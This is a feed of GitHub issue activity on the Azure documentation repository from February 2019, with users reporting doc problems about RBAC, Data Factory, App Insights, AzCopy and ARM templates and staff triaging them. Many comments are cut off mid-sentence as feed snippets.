Thanks for your feedback! We will investigate and update as appropriate.

[2019-02-21 23:53] mikeharder opened #25497 "Access Control - Owner vs Contributor"
This document recommends adding the Azure AD user account to the "owner" role.  However, if the "contributor" role is sufficient, I think it should be used instead per the principle of least privilege.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: f8e3fb12-19a9-eda8-bbc8-2e0b422c294d
* Version Independent ID: 7421bf93

[2019-02-21 23:53] MarileeTurscak-MSFT commented on #25478
Thanks, @RickyRoeslerMS

I have created a pull request for this here. https://github.com/MicrosoftDocs/azure-docs-pr/pull/67311

Changes generally go live in 24 hours once accepted.

[2019-02-21 23:53] #25478 closed

[2019-02-21 23:54] MarileeTurscak-MSFT commented on #25488
@agentKnipe
Thanks for your feedback! We will investigate and update as appropriate.

[2019-02-21 23:55] Karishma-Tiwari-MSFT commented on #25060
@dlepow Thanks for helping out on this. :)

I was getting the error with the Azure-CLI version 2.0.49 for this command with JMESPath query:
`az acr repository show-manifests --name myregistry --repository myrepo --query "[?!(tags[?'*'])].digest"`

I updated my CLI version to latest (2.0.58) and I am getting the same error with the above command (`--query "[?!(tags[?'*'])].digest`) but works with t

[2019-02-21 23:56] srrengar commented on #25495
hi @ththiem thanks for the feedback. You are correct, that article is a bit confusing, The recommended practice is using the App Insights SDK to instrument your application, with this you get application level diagnostics out of the box. However, you can also see platform events from Service Fabric (NodeUp, Down, etc.) in App Insights too and that is done through the portal configuration. That sec

[2019-02-21 23:57] MarkAtAgilliance opened #25498 "PATCH to scale data warehouse not working."
I have used patch on the SQL DWH as described above.  No queries are running at the time.  The rest API returns success.

This was the body:
[code]
and this was the return (private info obscured)

[code]
note the returned sku was the original and and the status is not "scaling".  On subsequent queries, the status did not change from online to scaling at any point and no scaling happened.

I also n

[2019-02-21 23:59] ththiem commented on #25495
Thanks for the quick reply. Can you also confirm, for .NET Core, if 2.2 is required for App Insights SDK features in Service Fabric, as mentioned here?

https://docs.microsoft.com/en-us/azure/azure-monitor/app/asp-net-core#application-insights-sdk-comparison

[2019-02-22 00:00] MarileeTurscak-MSFT commented on #25488
Thanks, @agentKnipe

I created a pull request to update this. Changes generally go live in 24 hours once accepted. https://github.com/MicrosoftDocs/azure-docs-pr/pull/67314

[2019-02-22 00:00] #25488 closed

[2019-02-22 00:05] srrengar commented on #25495
@brahmnes could you comment on the .NET Core version required for the App Insights SDK for Service Fabric? I didn't see it in the repo https://github.com/Microsoft/ApplicationInsights-servicefabric

[2019-02-22 00:06] alexdlevin commented on #25410
Sure Marilee,  I believe I have corrected the mistake and it appears to be working now.  In step number 5 above, it says to perform the following.

5.Select Properties and update the Home-page URL field to point to your RD Web endpoint (like https://\<rdhost\>.com/RDWeb

Because it is so much like step 1, what I did was copy internal URL to the home page URL, and then added /RDWeb to the end of it

[2019-02-22 00:14] MarileeTurscak-MSFT commented on #25380
This page describes the licensing editions, features, and their differences when using regular Azure AD. https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-sspr-licensing#compare-editions-and-features

I'm assigning this issue to the content author, @davidmu1 , to look into as I don't know if there is an equivalent page for b2c and some of the user voice items for this

[2019-02-22 00:19] ascortez commented on #24930
Also curious about an example like:

GIF  gif
GIF  jif

[2019-02-22 00:20] MarileeTurscak-MSFT commented on #25410
Yes, this should be the supported configuration. CC: @CelesteDG to confirm.

Feel free to make a pull request to the doc if you think the steps should be explained in a different way.

I am glad you were able to resolve this and thanks so much for sharing your solution!

We will now proceed to close this thread.

[2019-02-22 00:20] #25410 closed

[2019-02-22 00:21] ascortez opened #25499 "Possible to add comments to txt file?"
Would love to be able to add comments to the language model text file for documentation purposes. Is this possible?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 15ab661b-de71-2baf-2ae6-2b4e875107df
* Version Independent ID: 966ec357-e9ff-2e2c-1027-ceda734d3a73
* Content: [Customize pronunciation - Speech Services](ht

[2019-02-22 00:21] brahmnes commented on #25495
The Application Insights for Service Fabric nugets doesn't require anything specific in .NET core 2.0. It should work with anything from .NET core 1.1 and above. However, I am not sure about Application Insights SDK itself. I guess it depends on which version of the Application Insights ASP.NET core nuget and which version of Service Fabric SDK you are using.

You can check on the dependencies for

[2019-02-22 00:23] Karishma-Tiwari-MSFT commented on #24980
@rwwinn1 You need access to the subscription which has the VHD for creating the snapshots.

[2019-02-22 00:23] SaurabhSharma-MSFT commented on #25059
@Carsenik We will now proceed to close this thread. If there are further questions regarding this matter, please reopen it and we will gladly continue the discussion.

[2019-02-22 00:23] #25059 closed

[2019-02-22 00:31] SnehaGunda commented on #25201
@mack0196 I sent an email to our team to help with your questions, you can also send these questions to askcosmosdb@microsoft.com, a broader audience can look at and respond.

[2019-02-22 00:32] ththiem commented on #25495
Sounds good, thanks for the advice. Closing this.

[2019-02-22 00:32] #25495 closed

[2019-02-22 00:33] kgremban commented on #24583
Great, thanks for validating.

@Alberto-Vega-MSFT can you #please-close this issue as resolved?

[2019-02-22 00:36] SnehaGunda commented on #25129
@vd3d please share your feedback in uservoice and help our team prioritize this feature.

[2019-02-22 00:37] SnehaGunda commented on #25129
#please-close

[2019-02-22 00:40] viksingh commented on #6826
Is there a way to add log statements with in the map.  I have a scenario where the map is timing out at 2 minutes and I want to troubleshoot the steps to see how far it has gone.

[2019-02-22 00:42] DeMoriarty commented on #25163
@RohitMungi-MSFT
Now It's working, but it seems to have a few hours delay, is this normal?

[2019-02-22 00:58] kgremban commented on #23265
Did you set up the retry policy as described in the issue that was linked from your StackOverflow answer?
https://github.com/Azure/iotedge/issues/832
https://docs.microsoft.com/en-us/azure/iot-hub/iot-hub-reliability-features-in-sdks#net-implementation-guidance
https://github.com/Azure/azure-iot-sdk-csharp/blob/master/iothub/device/src/Transport/RetryDelegatingHandler.cs#L36

[2019-02-22 01:07] HectorSVC commented on #19208
Encounter this issue as well. Just went through the thread. I can't believe that, when I deploy a model, the IoT know how to do it. I mean it trigger the device to pull the image and starts a container. However, when I remove a deployment, it only stops the container instance, still left the docker image there! User may run out of disk space unaware of this if they keep trying deploy different mod

[2019-02-22 01:11] MGoedtel commented on #25265
@SHANE0MAC - Been meaning to address this so thanks for nudging me about this.  Let me see about getting this addressed tomorrow.  Bugging now.  #in-progress

[2019-02-22 01:17] spzitello commented on #25484
I do indeed have 99bd3317-b5f1-4efd-83d8-3c6b932ddeef in the list of allowed object id, but I don’t know what that refers to.
The object id for the object with client_id/client_secret that I am using is not that. — (but see below, it  is related)

I created the AD App Registration for this object but it does not show up as Service Principal  in the places (add Role) where I would expect to find se

[2019-02-22 01:19] BharathNimmala-MSFT commented on #25049
@polestra The limit is primarily regarding cores with in the subscription. When you create a support request to increase the limit the Quota type need to be "Compute/VM(cores/vCPUs) subscription limit increases"

![image](https://user-images.githubusercontent.com/45180002/53213094-73a90c00-35fc-11e9-8be4-c575814d8c1b.png)

Hope above information helps you. We will be assigning this issue to our pr

[2019-02-22 01:22] peteratwork opened #25501 "How to retrieve model generated from a previous experiment? How to load the model in Azure databricks environment?"
Hi, I created an experiment in the past and now I have the RunId which I see from my Azure portal workspace. How do I load the model in my databricks notebook from this RunId to do predictions? I see the model is output as a .pkl file.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 68a3df81-6871-c443-c413-16bb97982bd4

[2019-02-22 01:40] AlexanderTodorovic commented on #25332
@normesta Yes it helps. Regarding the code block I've just guessed that perhaps something is missing but with your explanation I see it's fine.
Please close this feedback. Thank you very much!

[2019-02-22 01:46] raghavan20 commented on #23265
I thought it was related only to sending messages to IoTHub service. I will find relevant Python code and give it a try.

[2019-02-22 01:49] mjuza opened #25502 "The Register disconnected with capacity billing section is incomplete"
The "connect to Azure and register" paragraph needs to be split out into the specific commands that are needed to accomplish this step just like they are in the two connected examples above.  The example scripts in this section contain variables that are not defined in the script themselves.  It assumes that previous commands were run in the same session.  Please add clarification and specific ste

[2019-02-22 02:07] BryanTrach-MSFT commented on #25484
@spzitello We will now proceed to close this thread. If there are further questions regarding this matter, please tag me in your reply. We will gladly continue the discussion and we will reopen the issue.

[2019-02-22 02:07] #25484 closed

[2019-02-22 02:09] BryanTrach-MSFT commented on #25489
@umerjaved Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 02:10] BryanTrach-MSFT commented on #25490
@bbartling Can you please provide us with the URL of the Azure Doc that you are having issues with? We look forward to your reply.

[2019-02-22 02:16] Alberto-Vega-MSFT commented on #25487
@explorer2015 Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-22 02:28] nacharya1 commented on #25501
Parahar,

Does scoring and deployment work in the same way for ADB as it does outside ADB?

Regards,
Nilesh

Get Outlook for Android<https://aka.ms/ghei36>

________________________________
From: peteratwork <notifications@github.com>
Sent: Thursday, February 21, 2019 5:22:35 PM
To: MicrosoftDocs/azure-docs
Cc: Nilesh Acharya; Mention
Subject: [MicrosoftDocs/azure-docs] How to retrieve model gener

[2019-02-22 02:30] Grace-MacJones-MSFT commented on #25493
@taromielnaz yes it is. This doc is about the App Service Environment v1. Howvever, there is a newer version of the App Service Environment. To learn more about the new version please see [ Introduction to the App Service Environment.](https://docs.microsoft.com/en-us/azure/app-service/environment/intro)

We will now proceed to close this thread. If there are further questions regarding this matte

[2019-02-22 02:30] #25493 closed

[2019-02-22 02:42] mike-urnun-msft commented on #25491
Hi @theangellmethod Thank you for your feedback! We will review and update as appropriate.

[2019-02-22 02:45] mike-urnun-msft commented on #25497
Hi @mikeharder Thank you for your feedback! We will review and update as appropriate.

[2019-02-22 02:46] Adebeer commented on #10813
@MicahMcKittrick-MSFT @dkkapur - any update on this issue?
I've got a gMSA cluster and ran into issues following the steps currently outlined in this documentation when adding a node. Specifically, the addnode.ps1 script worked fine, but I'm unable to do a configuration update as it fails with configuration update. The cluster manifest is only showing old nodes though - however the `Get-ServiceFab

[2019-02-22 02:48] bbartling commented on #25490
Sorry I don’t have one. Is there a direction someone can point me in to start? I took a intro to AI course thru Microsoft (Edx) that was basically a crash course on the Azure stack capabilities for AI... I am just looking to ask someone some questions prior to starting an Azure subscription to see if it’s even possible but I don’t know whom to ask... Thank you for any tips

Sent from my iPhone

On

[2019-02-22 02:54] Adebeer commented on #10813
mmm...ok, I just noticed the gMSA section on adding new nodes! For some reason missed that section when I first looked at this

[2019-02-22 02:56] DixitArora-MSFT commented on #25355
@Robar666  Just following up here... Hope my previous comment helps.

[2019-02-22 03:10] sahPraveen opened #25503 "How to send properties details with EventHub message?"
I am referring to this article "https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-python-get-started-send" related to sending messages to EventHub using Python.

A Message has following components: offset, body, systemProperties, properties
offset is auto-generated but we can provide the other.

For my project - apart from message body I also need to send "Properties" which is not part

[2019-02-22 03:19] #25494 closed

[2019-02-22 03:45] Rajeswari-Mamilla commented on #25372
Added. #please-close

[2019-02-22 03:49] KalyanChanumolu-MSFT commented on #25498
Thank you for the detailed feedback.
We are actively investigating this and will get back to you soon. 

[2019-02-22 03:49] craigsmitham opened #25506 "View E2E diagnostics for a given operation"
Is there a way to view the cross-component transaction chart for a given operation ID? The only way I can seem to navigate to it is via the "Failures" blade of application insights. It would be helpful to see the correlated transactions of any operation.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 88844d44-a476-9c82

[2019-02-22 03:57] #24918 closed

[2019-02-22 04:20] KetanChawda-MSFT commented on #25281
@sbrian26 Checking in to see if the above post helped answer your question. Let me know if there are still any additional issues I can help with.

[2019-02-22 04:20] isshukla opened #25509 "NSG Validation is test is faulty"
This script calls the script "prepare-subnet" from https://raw.githubusercontent.com/Microsoft/sql-server-samples/master/samples/manage/azure-sql-db-managed-instance/prepare-subnet

That Prepare subnet script test the subnet, and if any things is missing it will create it.
During our testing we found that it will create the NSG Rules for each Port.
After that it will say the Subnet is validated,
W

[2019-02-22 04:27] RohitMungi-MSFT commented on #25499
@ascortez Thanks for your feedback. Here is the [Contributor Guide](https://docs.microsoft.com/en-us/contribute/) that you can refer to if you plan to contribute to azure docs. Once you submit a pull request the content author will review and merge it.

[2019-02-22 04:27] DixitArora-MSFT commented on #25408
@bospoort I have assigned this to content author to review and update as appropriate.

[2019-02-22 04:30] AjayKumar-MSFT commented on #25003
@Mcswan, We will close this out, but if you feel you need more information kindly just let us know.

[2019-02-22 04:30] #25003 closed

[2019-02-22 04:30] CHEEKATLAPRADEEP-MSFT commented on #25332
@AlexanderTodorovic We will now proceed to close this thread. If there are further questions regarding this matter, please comment and we will gladly continue the discussion.

[2019-02-22 04:30] #25332 closed

[2019-02-22 04:31] CHEEKATLAPRADEEP-MSFT commented on #25306
@chall-bhs We will now proceed to close this thread. If there are further questions regarding this matter, please comment and we will gladly continue the discussion.

[2019-02-22 04:31] #25306 closed

[2019-02-22 04:36] angoyal-msft commented on #25509
@isshukla Thanks for the feedback. Could you please clarify the script you are referring to. I am not able to access this URL : https://raw.githubusercontent.com/Microsoft/sql-server-samples/master/samples/manage/azure-sql-db-managed-instance/prepare-subnet

It is giving Error: 404: Not Found

[2019-02-22 04:38] isshukla commented on #25509
https://github.com/Microsoft/sql-server-samples/blob/master/samples/manage/azure-sql-db-managed-instance/prepare-subnet/prepareSubnet.ps1<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2FMicrosoft%2Fsql-server-samples%2Fblob%2Fmaster%2Fsamples%2Fmanage%2Fazure-sql-db-managed-instance%2Fprepare-subnet%2FprepareSubnet.ps1&data=02%7C01%7Cisshukla%40microsoft.com%7C4232ca

[2019-02-22 04:47] hansenms commented on #25484
@spzitello glad you worked it out. I will acknowledge that AAD is a complicated product, I don't think we can replicate all the relevant information in our docs from AAD. If you search for AAD and service principles, there are a lot of articles on the differences between application registration id and service principal ids and object ids. It is a bit complicated, but makes sense after a while. We

[2019-02-22 04:48] CHEEKATLAPRADEEP-MSFT commented on #25357
@bertrandpons  To allow ADF from Azure to connect to your Azure SQL server, “Allow access to Azure Services” must be ON. When an ADF from Azure attempts to connect to your database server, the firewall verifies that Azure connections are allowed. A firewall setting with starting and ending address equal to 0.0.0.0 indicates Azure connections are allowed. If the connection attempt is not allowed, t

[2019-02-22 04:59] CHEEKATLAPRADEEP-MSFT commented on #25427
@thala321 Thanks for reporting this issue. This is being assigned to the content author to evaluate and update as appropriate.

@spelluru Could you please look into this issue?

[2019-02-22 05:02] CHEEKATLAPRADEEP-MSFT commented on #25476
@craigg-msft  Could you please look into this issue?

[2019-02-22 05:03] KetanChawda-MSFT commented on #25360
@nzmdgnc Yes you should consider the TZ as well because the recurrence will happen based on the TZ. Can you share Code View of your LA workflow to review. Yes RUN ID is the identifier in the run history.

Also just to confirm is this a pattern or you are seeing this behavior intermittently?

[2019-02-22 05:09] CHEEKATLAPRADEEP-MSFT commented on #25489
@umerjaved Could you ask your question in the forums? The audience there would be a better suited to answer your support question. Please provide as much detail as possible about your scenario: [Azure Data Factory - Forum](https://social.msdn.microsoft.com/forums/azure/en-US/home?forum=AzureDataFactory)

[2019-02-22 05:13] CHEEKATLAPRADEEP-MSFT commented on #25209
@JozoSlejko Thank you for the detailed feedback. This is being assigned to the content author to evaluate and update as appropriate.

@ShubhaVijayasarathy  Could you please look into this issue?

[2019-02-22 05:15] femsulu commented on #24458
Thanks to @mcollier, this issue has been resolved. Thanks again for raising this, @pvyver
We will now close this issue. If there are further questions regarding this matter, please reply and we will gladly continue the discussion.

[2019-02-22 05:15] #24458 closed

[2019-02-22 05:31] KrishnaG-MSFT commented on #25161
@ericcwk At this point it appears that there's no edits or updates needed for the documentation. Closing this issue for now. If there are further questions regarding this matter or questions or feedback on the documentation, please do let us know and we will gladly continue the discussion.

[2019-02-22 05:31] #25161 closed

[2019-02-22 05:34] nacharya1 commented on #25501
Hello Nilesh,

Yes it does. We are deploying to ACI/AKS from ADB hence it doesn’t matter from where it is deployed.

Thanks & Regards,
Parashar Shah
Day job – Making Automated ML (Azure Machine Learning) Lovable 😊

From: Nilesh Acharya <nilesha@microsoft.com>
Sent: Thursday, February 21, 2019 6:29 PM
To: MicrosoftDocs/azure-docs <reply@reply.github.com>; MicrosoftDocs/azure-docs <azure-docs@norepl

[2019-02-22 05:41] KetanChawda-MSFT commented on #25418
@rizwaans  The outputs section define the data that your workflow can return when finished running. For example, to track a specific status or value from each run, specify that the workflow output returns that data.

To get the output from a workflow run, review the logic app's run history and details in the Azure portal or use the Workflow REST API. You can also pass output to external systems, f

[2019-02-22 05:42] imeya commented on #25232
@KrishnaG-MSFT , I just thought about one more thing, if in the first 5 minutes, it sends an alert. then in the next 5 minutes, it also meets the need to send an alert. And at this time, it will send an alert? I see some articles says that alert is stateful, and will not send alert email continually.

can you help explain? and it would be good if there are some official docs.
thanks very much.

[2019-02-22 05:53] kobulloc-MSFT commented on #25506
@craigsmitham Thank you for the feedback!  We are investigating this and will get back to you shortly.

[2019-02-22 05:54] CHEEKATLAPRADEEP-MSFT commented on #25503
@sahPraveen Could you ask your question in the forums? The audience there would be a better suited to answer your question. Please provide as much detail as possible about your scenario: [Azure Event Hubs - Forum](https://stackoverflow.com/questions/tagged/azure-eventhub)

[2019-02-22 05:56] maverick126 commented on #25476
I am having the same frustration.  If would be nice to have this sorted.

[2019-02-22 05:57] YASWANTHM-MSFT commented on #25149
@KeiroKamioka0000 , Sorry for the delayed response.

Azure Storage analytics performs logging and provides metrics data for a storage account. You can use this data to trace requests, analyze usage trends, and diagnose issues with your storage account.
Storage Analytics logging records details for both successful and failed requests for your storage account. Storage Analytics logs enable you to re

[2019-02-22 05:58] CHEEKATLAPRADEEP-MSFT commented on #25489
@umerjaved We will now proceed to close this thread. If there are further questions regarding this matter, please comment and we will gladly continue the discussion.

[2019-02-22 05:58] #25489 closed

[2019-02-22 05:58] CHEEKATLAPRADEEP-MSFT commented on #25503
@sahPraveen We will now proceed to close this thread. If there are further questions regarding this matter, please comment and we will gladly continue the discussion.

[2019-02-22 05:58] #25503 closed

[2019-02-22 06:00] mganeshphani commented on #25398
@MarileeTurscak-MSFT I am very upset with your reply because of following reasons
1) you are not answering a straight question on why the article is not holding upto what it is meant for anymore, looks to me like another failure of powerBI team not able to keep things straight forward and clean
2) you haven't waited event a minute for my acknowledgement to close the ticket, looks like you are in a

[2019-02-22 06:02] bbartling commented on #25490
This is the step where I think in the edx intro to AI, that I swear there must have been an option to save/deploy the model as an excel spreadsheet, can someone confirm at all? Thanks

https://docs.microsoft.com/en-us/azure/machine-learning/studio/tutorial-part3-credit-risk-deploy

Sent from my iPhone

On Feb 21, 2019, at 8:10 PM, Bryan Trach <notifications@github.com<mailto:notifications@github.c

[2019-02-22 06:08] DixitArora-MSFT commented on #25461
@romankiss I believe Event Grid domains are currently in preview which is probably why only the preview api version supports it.

@banisadr Could you please confirm?

[2019-02-22 06:30] christiankuhtz opened #25518 "examples?"
Where are examples for how to retrieve metrics with PowerShell and CLI?  There's nothing really useful here https://docs.microsoft.com/en-us/cli/azure/monitor/metrics?view=azure-cli-latest#az-monitor-metrics-list that shows what to expect, how to work with metrics in a shell and how to manipulate the output.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft

[2019-02-22 06:35] VidyaSalimath opened #25519 "DataFlow option not visible in V2 version"
Am not able to see the option Data Flow in V2 version.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: ccf00363-3f01-bded-5d7b-0c15fecda6c1
* Version Independent ID: 114d19e7-bf5f-060c-55c0-71d1bc8cf1e9
* Content: [Create Azure Data Factory Mapping Data Flow](https://docs.microsoft.com/en-us/azure/data-factory/data-flow

[2019-02-22 06:46] Adebeer commented on #10813
Ok - I have this working just fine now!

As per above - the [MSDOC](https://docs.microsoft.com/en-us/azure/service-fabric/service-fabric-cluster-windows-server-add-remove-nodes) do actually contain a specific section on how to add gMSA nodes for gMSA secured clusters - not sure how I missed this section! It's actually much simpler - don't use AddNode.ps1 - simply do a configuration upgrade - but d

[2019-02-22 06:46] Adebeer commented on #10813
Ok - I have this working just fine now!

As per above - the [MSDOC](https://docs.microsoft.com/en-us/azure/service-fabric/service-fabric-cluster-windows-server-add-remove-nodes) do actually contain a specific section on how to add gMSA nodes for gMSA secured clusters - not sure how I missed this section! It's actually much simpler - don't use AddNode.ps1 - simply do a configuration upgrade - but d

[2019-02-22 06:47] RohitMungi-MSFT commented on #25501
@peteratwork Here is some [documentation ](https://docs.azuredatabricks.net/spark/latest/mllib/index.html#exporting-and-importing-ml-models) I found from azure databricks to import and export ML models. Could you please check if that helps loading your model in databricks. Here is one [git tutorial](https://github.com/Azure/MachineLearningNotebooks/tree/master/how-to-use-azureml/azure-databricks)

[2019-02-22 07:12] KrishnaG-MSFT commented on #25232
@imeya Sure :) I should have explained this earlier when I was explaining with the above example of 6 iterations but just thought that it would cause confusion if I explain what completely happens if condition is met at one particular iteration of time so I have stick to the question (i.e., question 1) that was regarding, will the alert work in frequency between 1:55 pm to 2:00 pm and will the ale

[2019-02-22 07:22] pdesmarets opened #25524 "Document types"
When storing documents of different types in the same collection (best practice with Cosmos DB), it comes in very handy to add a document type value-pair in each document.
Note also that there is a data modeling tool for Cosmos DB (and other NoSQL databases): https://hackolade.com

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.

[2019-02-22 07:29] dcbrown16 opened #25525 "Required permission"
What role/specific operation is required to create a SendGrid account through Azure? There is no associated resource provider from what I can see.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 73d91616-a93f-84af-7900-5aa34b361ffd
* Version Independent ID: f202a678-4853-d024-55c5-19f89558415c
* Content: [How to use the

[2019-02-22 07:31] CHEEKATLAPRADEEP-MSFT commented on #25519
@VidyaSalimath I see the Data Flow option is missing in the portal. But, I’m able to view Data Flow  (Preview) option is available after creating Azure Data Factory V2.

**Step1:** Create Azure Data Factory V2.

![image](https://user-images.githubusercontent.com/44426401/53226638-b1ac3b80-36a1-11e9-9b3f-bb3243fb4f37.png)

**Step2:** After ADF created, open **Author & Monitor** tab => Click on **Au

[2019-02-22 07:35] maknotavailable commented on #24704
The fix was to read the Workspace from config using the auth= parameter.

[2019-02-22 07:41] jjindrich commented on #24221
Did you created Azure DNS private zone first (with registered flag) ? Check my repo how to create it https://github.com/jjindrich/jjazure-templates/tree/master/dns-private-vm

[2019-02-22 07:41] angoyal-msft commented on #25524
@pdesmarets Thanks for your feedback. Could you please elaborate the exact concern which you are trying to address. Is there any enhancement required in document or you need more information regarding Modeling document data in NoSQL database.

[2019-02-22 07:43] DixitArora-MSFT commented on #25457
We don't have any specific IP for event grid subscriptions. It can be any IP's from the azure datacenter. If you want to whitelist the IP then we recommend to download all the Microsoft Azure Datacenter IP Ranges from this link https://www.microsoft.com/en-in/download/details.aspx?id=41653 and configure these IP, based on the region of the event grid topic that event grid subscription have configu

[2019-02-22 07:47] jakaruna-MSFT commented on #25339
@woodwardmatt Thanks for the feedback!
I think we can have a note added.
Tutorials are modeled in such a way that at the end all the resources are deleted.

I have assigned the issue to the content author to investigate further and update the document as appropriate.

[2019-02-22 07:47] lesterw1 opened #25526 "AZCopy v10 switch corrections"
There are no "-help" and "-h" switches as documented in several places above (this results in an error). The correct switches are "--help" and "--h" for the shorthand version. All switches have double dashes (--).

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 15911160-5ba2-fb0a-0b24-16b3857e20ce
* Version Independent

[2019-02-22 07:56] pdesmarets commented on #25524
@angoyal-msft  I suggest that the examples in the https://docs.microsoft.com/en-us/azure/cosmos-db/modeling-data article be enhanced with a value-pair "docType: xxx"

[2019-02-22 07:59] angoyal-msft commented on #25524
@pdesmarets Thanks for the suggestion. I have assigned this issue to content author to help you further.
@aliuy Could you please help us with appropriate doc enhancement as requested.

[2019-02-22 08:00] dcbrown16 opened #25527 "Non-Microsoft resource providers"
I see that there are non-Microsoft resource providers, such as Sendgrid.email for example. How do these function in terms of RBAC? They aren't documented on the operations page below.
https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

*

[2019-02-22 08:02] Nilis312 commented on #25256
I see multiple people having an issue with MacOS and RDP when MFA is enabled in this way. As it should be supported to use Mac with RDS2016 the question is if it is supported with MFA as well (and thus working)?

Also my questions about the RDS HTML5 web client (installation on RDS server) if that is supported besides the RDWEB default installation described in this blog in combination with NPS an

[2019-02-22 08:02] dcbrown16 commented on #25525
On further investigation, the resource provider is apparently Sendgrid.Email. That sort of explains why I wasn't seeing it in the list below.
https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations

How does this resource provider work in terms of RBAC? Can we restrict permissions on this provider?

[2019-02-22 08:10] dcbrown16 commented on #25527
I guess my expectation is that you can only interact with these resource providers through RBAC by either having a role with */ permissions or explicitly creating a custom role with permissions on those providers. Any confirmation you can provide would be appreciated.

[2019-02-22 08:11] imeya opened #25528 "Does app insights have some bad impact on what is being monitored?"
Does app insights have some bad impact on what is being monitored? like performance etc.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 0526b200-ba5c-5427-35a8-1290d23bcada
* Version Independent ID: 4ca174bd-6fbb-7b74-8065-eaabdb10a699
* Content: [Azure Application Insights FAQ](https://docs.microsoft.com/en-us/azure/a

[2019-02-22 08:16] stevehurcombe commented on #25238
This is in the case of deleting a single user, and therefore a single logical partition.

[2019-02-22 08:18] SumanthMarigowda-MSFT commented on #25526
@lesterw1 Thanks for bringing this to our attention. We are checking on this and will respond to you soon.

[2019-02-22 08:22] KetanChawda-MSFT commented on #25434
@CastleArg Can you share the screenshot/steps of you DevOps pipeline?

Also give a try with the steps as shown below and see if that helps?

![image](https://user-images.githubusercontent.com/28587628/53228767-2da98200-36a8-11e9-95a7-69fcbabc51ff.png)

![image](https://user-images.githubusercontent.com/28587628/53228784-3f8b2500-36a8-11e9-9bf3-cea82243d99a.png)

[2019-02-22 08:23] marnheus opened #25529 "How to generate arm parameter for trigger schedule"
Hello. I'm trying to generate parameters for a scheduled trigger time. Issue is that the minutes and hours are directly arrays so I can't seem to find the syntax to get them outputed as parameters.
"typeProperties": {
                    "recurrence": {
                        "frequency": "Day",
                        "interval": 1,
                        "startTime": "2018-09-18T12:33:00Z",

[2019-02-22 08:25] kobulloc-MSFT commented on #25528
@imeya Hello again, and thank you for the feedback!  We are investigating this and will get back to you shortly.

[2019-02-22 08:26] PaulSells opened #25530 "Setting Action Group from Metric Alert Template"
When deploying a metric alert using the sample template there appears to be an issue when setting the action group. I'm passing in the the full resource id of an existing ActionGroup in the format

/subscriptions/(SubscriptionID)/resourceGroups/(resourceGroup)/providers/microsoft.insights/actionGroups/(ActionGroup)

I've also tried "[resourceId('microsoft.insights/actionGroups', parameters('action

[2019-02-22 08:37] YASWANTHM-MSFT commented on #25407
@moab360, If the storage account created with kind “StorageV1” and SKU “ZRS”. You will not get the option to upgrade from StorageV1 to StorageV2, also you can’t change the replication to LRS, GRS & RA-GRS.
![image](https://user-images.githubusercontent.com/44457111/53229770-20da5d80-36ab-11e9-8d0c-e83003f3b8b8.png)

You can switch Azure Storage account replication from LRS (Locally redundant stora

[2019-02-22 08:38] femsulu commented on #25518
@christiankuhtz Thanks for bringing this to our attention. Your feedback has been shared with the content owner for further review.

[2019-02-22 08:50] femsulu commented on #25122
since @tonguyen10 no longer resolves in GH, assigning to @cwatson-cat to review and consider updating document with what-if sample

[2019-02-22 08:56] rajeevsinghAD commented on #10953
+1 Please provide ABFS docs

[2019-02-22 09:03] daruizcorrea opened #25531 "Network subnet error"
PROD-DC-EUS2	10.245.42.0/23	251	Domain controller VMs
It should be /24

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 5d55f111-797f-7e1b-c1a0-08c00af0174e
* Version Independent ID: 157d8898-43bf-a9ca-810b-0c4ec400ad69
* Content: [Contoso-Set up a migration infrastructure](https://docs.microsoft.com/en-us/azure/migrate/

[2019-02-22 09:03] hmayer1980 opened #25532 "How to Specify Dimensions and "select *" in ARM Template"
I am trying to create an ARM Template with a simple static value , but cannot figure out how to specify the "Select*" option in the Dimensions sections of a Criteria available int he Azure Portal into the ARM Template.
I have not found a single example.
I want to include int he Criteria below the Dimensions
 - "Failure Type" with the option "select *"
 - "Pipeline" with the option "select *"

All

[2019-02-22 09:23] squasta opened #25533 "Support of Let's Encrypt CA ?"
Hi, is there any plan to add Let's Encrypt (https://letsencrypt.org/) to the list of authorized CA ?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 2e787652-0c22-e376-ab55-2b3aa8055431
* Version Independent ID: 961cf93b-5312-c470-7784-1da8fe5e4351
* Content: [Allowed certificate authorities for enabling custom HTTPS on

[2019-02-22 09:25] FrancoisDfr commented on #8702
Hi all

Me too

[2019-02-22 09:26] CHEEKATLAPRADEEP-MSFT commented on #25529
@marnheus You may refer [MSDN](https://social.msdn.microsoft.com/Forums/azure/en-US/b1e91b84-e24d-4d6b-bb1a-8ef2fc7a556f/azure-data-factory-passing-parameter-to-trigger?forum=AzureDataFactory) thread which addressing similar issue.

Hope this helps.

[2019-02-22 09:27] snehithm commented on #22105
Hi folks,

Thanks for providing the repro and sorry for the incovenience. We identified a bug which was causing this. We are working on a fix. I will keep you posted when the fix lands.

Regards,
Snehith

[2019-02-22 09:27] VidyaSalimath commented on #25519
